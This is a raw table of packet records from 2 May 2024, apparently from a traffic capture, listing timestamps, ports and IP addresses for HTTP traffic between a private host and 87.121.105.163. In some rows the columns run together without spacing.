                                                                              May 2, 2024 17:20:58.019639015 CEST  49730        80         192.168.2.4     87.121.105.163
                                                                              May 2, 2024 17:20:58.019803047 CEST  80           49730      87.121.105.163  192.168.2.4
                                                                              May 2, 2024 17:20:58.019817114 CEST  80           49730      87.121.105.163  192.168.2.4
                                                                              May 2, 2024 17:20:58.019854069 CEST  49730        80         192.168.2.4     87.121.105.163
                                                                              May 2, 2024 17:20:58.019881964 CEST  80           49730      87.121.105.163  192.168.2.4
                                                                              May 2, 2024 17:20:58.019896030 CEST  80           49730      87.121.105.163  192.168.2.4
                                                                              May 2, 2024 17:20:58.019928932 CEST  49730        80         192.168.2.4     87.121.105.163
                                                                              May 2, 2024 17:20:58.019946098 CEST  80           49730      87.121.105.163  192.168.2.4
                                                                              May 2, 2024 17:20:58.019958973 CEST  80           49730      87.121.105.163  192.168.2.4
                                                                              May 2, 2024 17:20:58.019994020 CEST  49730        80         192.168.2.4     87.121.105.163
                                                                              May 2, 2024 17:20:58.019995928 CEST  80           49730      87.121.105.163  192.168.2.4
                                                                              May 2, 2024 17:20:58.020028114 CEST  80           49730      87.121.105.163  192.168.2.4
                                                                              May 2, 2024 17:20:58.020071983 CEST  49730        80         192.168.2.4     87.121.105.163
                                                                              May 2, 2024 17:20:58.186374903 CEST  80           49730      87.121.105.163  192.168.2.4
                                                                              May 2, 2024 17:20:58.186407089 CEST  80           49730      87.121.105.163  192.168.2.4
                                                                              May 2, 2024 17:20:58.186459064 CEST  80           49730      87.121.105.163  192.168.2.4
                                                                              May 2, 2024 17:20:58.186475992 CEST  49730        80         192.168.2.4     87.121.105.163
                                                                              May 2, 2024 17:20:58.186547995 CEST  80           49730      87.121.105.163  192.168.2.4
                                                                              May 2, 2024 17:20:58.186593056 CEST  49730        80         192.168.2.4     87.121.105.163
                                                                              May 2, 2024 17:20:58.186614990 CEST  80           49730      87.121.105.163  192.168.2.4
                                                                              May 2, 2024 17:20:58.186682940 CEST  80           49730      87.121.105.163  192.168.2.4
                                                                              May 2, 2024 17:20:58.186726093 CEST  49730        80         192.168.2.4     87.121.105.163
                                                                              May 2, 2024 17:20:58.186763048 CEST  80           49730      87.121.105.163  192.168.2.4
                                                                              May 2, 2024 17:20:58.186892986 CEST  80           49730      87.121.105.163  192.168.2.4
                                                                              May 2, 2024 17:20:58.186937094 CEST  49730        80         192.168.2.4     87.121.105.163
                                                                              May 2, 2024 17:20:58.186954021 CEST  80           49730      87.121.105.163  192.168.2.4
                                                                              May 2, 2024 17:20:58.187026024 CEST  80           49730      87.121.105.163  192.168.2.4
                                                                              May 2, 2024 17:20:58.187067986 CEST  49730        80         192.168.2.4     87.121.105.163
                                                                              May 2, 2024 17:20:58.187089920 CEST  80           49730      87.121.105.163  192.168.2.4
                                                                              May 2, 2024 17:20:58.187155008 CEST  80           49730      87.121.105.163  192.168.2.4
                                                                              May 2, 2024 17:20:58.187199116 CEST  49730        80         192.168.2.4     87.121.105.163
                                                                              May 2, 2024 17:20:58.187258005 CEST  80           49730      87.121.105.163  192.168.2.4
                                                                              May 2, 2024 17:20:58.187362909 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.187412977 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.187478065 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.187558889 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.187607050 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.187685966 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.187764883 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.187807083 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.187901020 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.187937975 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.187978983 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.353374004 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.353387117 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.353450060 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.353452921 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.353528976 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.353568077 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.353621960 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.353701115 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.353751898 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.353761911 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.353815079 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.353859901 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.353880882 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.353923082 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.353964090 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.353979111 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.354001999 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.354041100 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.354089022 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.354134083 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.354173899 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.354188919 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.354250908 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.354293108 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.354309082 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.354350090 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.354391098 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.354445934 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.354543924 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.354588032 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.354593039 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.354691029 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.354743004 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.354763031 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.354785919 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.354787111 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.354809046 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.354845047 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.354882956 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.354964972 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.354998112 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.355034113 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.355083942 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.355092049 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.355137110 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.355159044 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.355228901 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.355273008 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.355304003 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.355379105 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.355427980 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.355454922 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.355519056 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.355566025 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.355576992 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.355602026 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.355655909 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.355667114 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.355732918 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.355849981 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.520406961 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.520626068 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.520633936 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.520641088 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.520648003 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.520661116 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.520674944 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.520689011 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.520694017 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.520699978 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.520703077 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.520714998 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.520737886 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.520759106 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.520788908 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.520819902 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.520833015 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.520839930 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.520864964 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.520868063 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.520910978 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.521178007 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.521226883 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.521234989 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.521246910 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.521277905 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.521300077 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.521333933 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.521341085 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.521379948 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.521603107 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.521615028 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.521656036 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.521699905 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.521733046 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.521749020 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.521773100 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.521795034 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.521847010 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.521847963 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.521855116 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.521893978 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.521982908 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.521991014 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.522002935 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.522032976 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.522043943 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.522069931 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.522097111 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.522119045 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.522126913 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.522170067 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.522170067 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.522176981 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.522193909 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.522208929 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.522233009 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.522248983 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.522258043 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.522298098 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.522397995 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.522504091 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.522547007 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.522576094 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.522648096 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.522691011 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.522722960 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.522811890 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.522875071 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.522896051 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.523004055 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.523026943 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.523061991 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.523118019 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.523135900 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.523160934 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.523181915 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.523207903 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.523225069 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.523245096 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.523292065 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.523293972 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.523302078 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.523313999 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.523344994 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.523369074 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.523375988 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.523387909 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.523415089 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.523427010 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.523437023 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.523437977 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.523464918 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.523475885 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.523525953 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.523533106 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.523571968 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.523608923 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.523649931 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.523652077 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.523667097 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.523693085 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.523704052 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.523762941 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.523804903 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.523811102 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.523829937 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.523837090 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.523880959 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.523883104 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.523900986 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.523925066 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.523929119 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.523969889 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.523988008 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.523996115 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.524039030 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.687475920 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.687490940 CEST804973087.121.105.163192.168.2.4
                                                                              May 2, 2024 17:20:58.687557936 CEST4973080192.168.2.487.121.105.163
                                                                              May 2, 2024 17:20:58.687560081 CEST804973087.121.105.163192.168.2.4
Timestamp                            Src Port  Dst Port  Source IP        Dest IP
May 2, 2024 17:20:58.687638998 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.687676907 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.687724113 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.687756062 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.687798023 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.687802076 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.687851906 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.687897921 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.687951088 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.687987089 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.688045025 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.688067913 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.688141108 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.688189030 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.688198090 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.688246965 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.688291073 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.688323021 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.688364029 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.688411951 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.688443899 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.688489914 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.688534975 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.688565969 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.688611984 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.688653946 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.688711882 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.688777924 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.688824892 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.688833952 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.688898087 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.688945055 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.688971996 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.689112902 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.689156055 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.689177990 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.689233065 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.689285040 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.689292908 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.689409018 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.689461946 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.689503908 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.689526081 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.689582109 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.689585924 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.689630985 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.689675093 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.689694881 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.689805031 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.689862967 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.689879894 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.689948082 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.689990997 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.690023899 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.690134048 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.690181971 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.690207958 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.690314054 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.690361977 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.690412045 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.690500975 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.690542936 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.690577030 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.690686941 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.690731049 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.690762997 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.690802097 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.690840960 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.690880060 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.690949917 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.690992117 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.691009045 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.691068888 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.691109896 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.691127062 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.691180944 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.691211939 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.691227913 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.691255093 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.691301107 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.691334009 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.691354990 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.691396952 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.691463947 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.691503048 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.691556931 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.691556931 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.691611052 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.691651106 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.691673040 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.691775084 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.691816092 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.691848040 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.691956997 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.692008972 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.692025900 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.692089081 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.692131042 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.692167997 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.692213058 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.692251921 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.692253113 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.692379951 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.692435980 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.692596912 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.692653894 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.692727089 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.692729950 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.692775011 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.692816973 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.692817926 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.692895889 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.692941904 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.692948103 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.693078995 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.693123102 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.693173885 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.693243027 CEST  80        49730     87.121.105.163   192.168.2.4
May 2, 2024 17:20:58.693288088 CEST  49730     80        192.168.2.4      87.121.105.163
May 2, 2024 17:20:58.693348885 CEST  80        49730     87.121.105.163   192.168.2.4
